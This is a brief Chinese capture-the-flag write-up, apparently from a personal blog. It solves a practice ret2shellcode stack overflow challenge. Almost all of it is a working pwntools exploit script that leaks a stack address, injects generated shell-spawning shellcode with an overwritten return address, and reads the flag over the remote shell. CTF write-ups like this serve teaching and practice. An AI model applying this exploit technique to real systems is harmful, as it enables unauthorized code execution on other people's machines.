总结
基础的ret2shellcode的题目,直接用pwntools生成shellcode即可。
EXP
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
|
#!/usr/bin/python3
# -*- encoding: utf-8 -*-
# author: roderick
from pwncli import *
context.binary = "./root_me_stack_buffer_overflow_basic"
context.log_level = "debug"
io = remote("node4.buuoj.cn", 29064)
sh = shellcraft.sh()
data = "aaaa"
io.sendlineafter("Give me data to dump:\n", data)
m = io.recvline()
log_ex(f"Get msg: {m}")
stack_addr = int16_ex(m[:10])
log_address("stack_addr", stack_addr)
io.sendlineafter("Dump again (y/n):\n", "y")
data = flat({
0:asm(sh),
164: stack_addr
})
io.sendlineafter("Give me data to dump:\n", data)
io.sendlineafter("Dump again (y/n):\n", "n")
io.sendline("cat flag")
io.interactive()
|
引用与参考
1、My Blog
2、Ctf Wiki
3、pwncli
roderick
支付宝
微信